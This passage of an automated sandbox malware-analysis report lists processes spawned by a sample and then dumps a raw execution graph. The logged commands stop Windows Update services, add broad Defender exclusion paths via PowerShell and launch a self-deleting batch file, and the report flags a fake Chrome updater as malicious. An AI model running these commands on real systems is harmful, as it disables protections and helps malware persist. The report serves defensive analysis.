                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:sc stop wuauserv
                                                                                        Imagebase:0x7ff6b7320000
                                                                                        File size:72'192 bytes
                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:44
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:45
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:46
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:sc stop bits
                                                                                        Imagebase:0x7ff6b7320000
                                                                                        File size:72'192 bytes
                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:47
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:Tasklist /fi "PID eq 5064"
                                                                                        Imagebase:0x7ff633870000
                                                                                        File size:106'496 bytes
                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:48
                                                                                        Start time:21:56:32
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\find.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:find ":"
                                                                                        Imagebase:0x7ff7fd3b0000
                                                                                        File size:17'920 bytes
                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:49
                                                                                        Start time:21:56:33
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:sc stop dosvc
                                                                                        Imagebase:0x7ff6b7320000
                                                                                        File size:72'192 bytes
                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:50
                                                                                        Start time:21:56:33
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\dialer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\dialer.exe
                                                                                        Imagebase:0x7ff7f0870000
                                                                                        File size:39'936 bytes
                                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:52
                                                                                        Start time:21:56:33
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:55
                                                                                        Start time:21:56:33
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\winlogon.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:winlogon.exe
                                                                                        Imagebase:0x7ff7cd660000
                                                                                        File size:906'240 bytes
                                                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:56
                                                                                        Start time:21:56:34
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:57
                                                                                        Start time:21:56:34
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:Timeout /T 1 /Nobreak
                                                                                        Imagebase:0x7ff7e6c40000
                                                                                        File size:32'768 bytes
                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:58
                                                                                        Start time:21:56:34
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:61
                                                                                        Start time:21:56:34
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Program Files\Google\Chrome\updater.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                                                                                        Imagebase:0x7ff74a170000
                                                                                        File size:5'617'152 bytes
                                                                                        MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 88%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:62
                                                                                        Start time:21:56:34
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:wmic os get Caption
                                                                                        Imagebase:0x7ff6c5c80000
                                                                                        File size:576'000 bytes
                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:63
                                                                                        Start time:21:56:34
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\lsass.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\lsass.exe
                                                                                        Imagebase:0x7ff7a2ae0000
                                                                                        File size:59'456 bytes
                                                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:64
                                                                                        Start time:21:56:34
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:65
                                                                                        Start time:21:56:34
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:66
                                                                                        Start time:21:56:35
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:Tasklist /fi "PID eq 5064"
                                                                                        Imagebase:0x7ff633870000
                                                                                        File size:106'496 bytes
                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:67
                                                                                        Start time:21:56:35
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\find.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:find ":"
                                                                                        Imagebase:0x7ff7fd3b0000
                                                                                        File size:17'920 bytes
                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:68
                                                                                        Start time:21:56:36
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:69
                                                                                        Start time:21:56:36
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:Timeout /T 1 /Nobreak
                                                                                        Imagebase:0x7ff7e6c40000
                                                                                        File size:32'768 bytes
                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:70
                                                                                        Start time:21:56:37
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                        Imagebase:0x7ff70ed80000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:71
                                                                                        Start time:21:56:37
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:72
                                                                                        Start time:21:56:37
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:Tasklist /fi "PID eq 5064"
                                                                                        Imagebase:0x7ff633870000
                                                                                        File size:106'496 bytes
                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:73
                                                                                        Start time:21:56:37
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\find.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:find ":"
                                                                                        Imagebase:0x7ff7fd3b0000
                                                                                        File size:17'920 bytes
                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:96
                                                                                        Start time:21:56:38
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:
                                                                                        Has administrator privileges:
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:244
                                                                                        Start time:21:56:39
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:
                                                                                        Has administrator privileges:
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:274
                                                                                        Start time:21:56:40
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:
                                                                                        Has administrator privileges:
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:300
                                                                                        Start time:21:56:47
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:
                                                                                        Has administrator privileges:
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:320
                                                                                        Start time:21:57:02
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:
                                                                                        Has administrator privileges:
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:325
                                                                                        Start time:21:57:05
                                                                                        Start date:04/06/2024
                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:
                                                                                        Has administrator privileges:
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:10.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:23.4%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:56
                                                                                          execution_graph 20543 7ff6ceb35b00 20544 7ff6ceb35b0b 20543->20544 20552 7ff6ceb3ff54 20544->20552 20565 7ff6ceb411a8 EnterCriticalSection 20552->20565 20139 7ff6ceb3bd80 20140 7ff6ceb3bd85 20139->20140 20144 7ff6ceb3bd9a 20139->20144 20145 7ff6ceb3bda0 20140->20145 20146 7ff6ceb3bdea 20145->20146 20147 7ff6ceb3bde2 20145->20147 20149 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20146->20149 20148 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20147->20148 20148->20146 20150 7ff6ceb3bdf7 20149->20150 20151 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20150->20151 20152 7ff6ceb3be04 20151->20152 20153 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20152->20153 20154 7ff6ceb3be11 20153->20154 20155 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20154->20155 20156 7ff6ceb3be1e 20155->20156 20157 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20156->20157 20158 7ff6ceb3be2b 20157->20158 20159 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20158->20159 20160 7ff6ceb3be38 20159->20160 20161 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20160->20161 20162 7ff6ceb3be45 20161->20162 20163 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20162->20163 20164 7ff6ceb3be55 20163->20164 20165 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20164->20165 20166 7ff6ceb3be65 20165->20166 20171 7ff6ceb3bc4c 20166->20171 20185 7ff6ceb411a8 EnterCriticalSection 20171->20185 20566 7ff6ceb42500 20577 7ff6ceb48494 20566->20577 20578 7ff6ceb484a1 20577->20578 20579 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20578->20579 20580 7ff6ceb484bd 20578->20580 20579->20578 20581 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20580->20581 20582 7ff6ceb42509 20580->20582 20581->20580 20583 7ff6ceb411a8 EnterCriticalSection 20582->20583 20584 7ff6ceb3ab00 20587 7ff6ceb3aa80 20584->20587 20594 7ff6ceb411a8 EnterCriticalSection 20587->20594 20039 7ff6ceb4be14 20042 7ff6ceb35b68 LeaveCriticalSection 20039->20042 19945 7ff6ceb3a715 19946 7ff6ceb3b188 45 API calls 19945->19946 19947 7ff6ceb3a71a 19946->19947 19948 7ff6ceb3a78b 19947->19948 19949 7ff6ceb3a741 GetModuleHandleW 19947->19949 19957 7ff6ceb3a618 19948->19957 19949->19948 19955 7ff6ceb3a74e 19949->19955 19955->19948 19971 7ff6ceb3a83c GetModuleHandleExW 19955->19971 19977 7ff6ceb411a8 EnterCriticalSection 19957->19977 19972 7ff6ceb3a899 19971->19972 19973 7ff6ceb3a870 GetProcAddress 19971->19973 19975 7ff6ceb3a89e FreeLibrary 19972->19975 19976 7ff6ceb3a8a5 19972->19976 19974 7ff6ceb3a882 19973->19974 19974->19972 19975->19976 19976->19948 20891 7ff6ceb4bc8e 20892 7ff6ceb4bc9e 20891->20892 20895 7ff6ceb35b68 LeaveCriticalSection 20892->20895 20228 7ff6ceb29d9b 20229 7ff6ceb29da1 20228->20229 20230 7ff6ceb2b850 12 API calls 20229->20230 20231 7ff6ceb2a656 20229->20231 20230->20231 19275 7ff6ceb41720 19276 7ff6ceb41744 19275->19276 19278 7ff6ceb41754 19275->19278 19277 7ff6ceb35cb4 _get_daylight 11 API calls 19276->19277 19300 7ff6ceb41749 19277->19300 19279 7ff6ceb41a34 19278->19279 19280 7ff6ceb41776 19278->19280 19281 7ff6ceb35cb4 _get_daylight 11 API calls 19279->19281 19282 7ff6ceb41797 19280->19282 19421 7ff6ceb41ddc 19280->19421 19283 7ff6ceb41a39 19281->19283 19286 7ff6ceb41809 19282->19286 19287 7ff6ceb417bd 19282->19287 19292 7ff6ceb417fd 19282->19292 19285 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19283->19285 19285->19300 19290 7ff6ceb3f948 _get_daylight 11 API calls 19286->19290 19304 7ff6ceb417cc 19286->19304 19436 7ff6ceb3a474 19287->19436 19288 7ff6ceb418b6 19299 7ff6ceb418d3 19288->19299 19305 7ff6ceb41925 19288->19305 19293 7ff6ceb4181f 19290->19293 19292->19288 19292->19304 19442 7ff6ceb481dc 19292->19442 19296 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19293->19296 19295 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19295->19300 19301 7ff6ceb4182d 19296->19301 19297 7ff6ceb417c7 19302 7ff6ceb35cb4 _get_daylight 11 API calls 19297->19302 19298 7ff6ceb417e5 19298->19292 19307 7ff6ceb41ddc 45 API calls 19298->19307 19303 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19299->19303 19301->19292 19301->19304 19309 7ff6ceb3f948 _get_daylight 11 API calls 19301->19309 19302->19304 19306 7ff6ceb418dc 19303->19306 19304->19295 19305->19304 19308 7ff6ceb4422c 40 API calls 19305->19308 19315 7ff6ceb418e1 19306->19315 19478 7ff6ceb4422c 19306->19478 19307->19292 19310 7ff6ceb41962 19308->19310 19312 7ff6ceb4184f 19309->19312 19313 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19310->19313 19317 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19312->19317 19318 7ff6ceb4196c 19313->19318 19314 7ff6ceb41a28 19320 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19314->19320 19315->19314 19321 7ff6ceb3f948 _get_daylight 11 API calls 19315->19321 19316 7ff6ceb4190d 19319 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19316->19319 19317->19292 19318->19304 19318->19315 19319->19315 19320->19300 19322 7ff6ceb419b0 19321->19322 19323 7ff6ceb419b8 19322->19323 19324 7ff6ceb419c1 19322->19324 19325 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19323->19325 19326 7ff6ceb3b25c __std_exception_copy 37 API calls 19324->19326 19327 7ff6ceb419bf 19325->19327 19328 7ff6ceb419d0 19326->19328 19332 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19327->19332 19329 7ff6ceb419d8 19328->19329 19330 7ff6ceb41a63 19328->19330 19487 7ff6ceb482f4 19329->19487 19331 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19330->19331 19334 7ff6ceb41a77 19331->19334 19332->19300 19336 7ff6ceb41aa0 19334->19336 19344 7ff6ceb41ab0 19334->19344 19340 7ff6ceb35cb4 _get_daylight 11 API calls 19336->19340 19337 7ff6ceb41a20 19341 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19337->19341 19338 7ff6ceb419ff 19339 7ff6ceb35cb4 _get_daylight 11 API calls 19338->19339 19342 7ff6ceb41a04 19339->19342 19368 7ff6ceb41aa5 19340->19368 19341->19314 19343 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19342->19343 19343->19327 19345 7ff6ceb41d93 19344->19345 19346 7ff6ceb41ad2 19344->19346 19347 7ff6ceb35cb4 _get_daylight 11 API calls 19345->19347 19348 7ff6ceb41aef 19346->19348 19406 7ff6ceb41ec4 19346->19406 19349 7ff6ceb41d98 19347->19349 19352 7ff6ceb41b63 19348->19352 19354 7ff6ceb41b17 19348->19354 19358 7ff6ceb41b57 19348->19358 19351 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19349->19351 19351->19368 19356 7ff6ceb41b8b 19352->19356 19359 7ff6ceb3f948 _get_daylight 11 API calls 19352->19359 19373 7ff6ceb41b26 19352->19373 19353 7ff6ceb41c16 19367 7ff6ceb41c33 19353->19367 19374 7ff6ceb41c86 19353->19374 19506 7ff6ceb3a4b0 19354->19506 19356->19358 19361 7ff6ceb3f948 _get_daylight 11 API calls 19356->19361 19356->19373 19358->19353 19358->19373 19512 7ff6ceb4809c 19358->19512 19363 7ff6ceb41b7d 19359->19363 19366 7ff6ceb41bad 19361->19366 19362 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19362->19368 19369 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19363->19369 19364 7ff6ceb41b21 19370 7ff6ceb35cb4 _get_daylight 11 API calls 19364->19370 19365 7ff6ceb41b3f 19365->19358 19376 7ff6ceb41ec4 45 API calls 19365->19376 19371 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19366->19371 19372 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19367->19372 19369->19356 19370->19373 19371->19358 19375 7ff6ceb41c3c 19372->19375 19373->19362 19374->19373 19377 7ff6ceb4422c 40 API calls 19374->19377 19379 7ff6ceb4422c 40 API calls 19375->19379 19383 7ff6ceb41c42 19375->19383 19376->19358 19378 7ff6ceb41cc4 19377->19378 19380 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19378->19380 19381 7ff6ceb41c6e 19379->19381 19384 7ff6ceb41cce 19380->19384 19385 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19381->19385 19382 7ff6ceb41d87 19386 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19382->19386 19383->19382 19387 7ff6ceb3f948 _get_daylight 11 API calls 19383->19387 19384->19373 19384->19383 19385->19383 19386->19368 19388 7ff6ceb41d13 19387->19388 19389 7ff6ceb41d1b 19388->19389 19390 7ff6ceb41d24 19388->19390 19391 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19389->19391 19392 7ff6ceb41344 _wfindfirst32i64 37 API calls 19390->19392 19393 7ff6ceb41d22 19391->19393 19394 7ff6ceb41d32 19392->19394 19398 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19393->19398 19395 7ff6ceb41dc7 19394->19395 19396 7ff6ceb41d3a SetEnvironmentVariableW 19394->19396 19397 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19395->19397 19399 7ff6ceb41d7f 19396->19399 19400 7ff6ceb41d5e 19396->19400 19402 7ff6ceb41ddb 19397->19402 19398->19368 19403 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19399->19403 19401 7ff6ceb35cb4 _get_daylight 11 API calls 19400->19401 19404 7ff6ceb41d63 19401->19404 19403->19382 19405 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19404->19405 19405->19393 19407 7ff6ceb41f04 19406->19407 19408 7ff6ceb41ee7 19406->19408 19409 7ff6ceb3f948 _get_daylight 11 API calls 19407->19409 19408->19348 19416 7ff6ceb41f28 19409->19416 19410 7ff6ceb41fac 19411 7ff6ceb3b2bc __CxxCallCatchBlock 45 API calls 19410->19411 19413 7ff6ceb41fb2 19411->19413 19412 7ff6ceb41f89 19414 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19412->19414 19414->19408 19415 7ff6ceb3f948 _get_daylight 11 API calls 19415->19416 19416->19410 19416->19412 19416->19415 19417 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19416->19417 19418 7ff6ceb41344 _wfindfirst32i64 37 API calls 19416->19418 19419 7ff6ceb41f98 19416->19419 19417->19416 19418->19416 19420 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19419->19420 19420->19410 19422 7ff6ceb41e11 19421->19422 19428 7ff6ceb41df9 19421->19428 19423 7ff6ceb3f948 _get_daylight 11 API calls 19422->19423 19431 7ff6ceb41e35 19423->19431 19424 7ff6ceb41e96 19426 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19424->19426 19425 7ff6ceb3b2bc __CxxCallCatchBlock 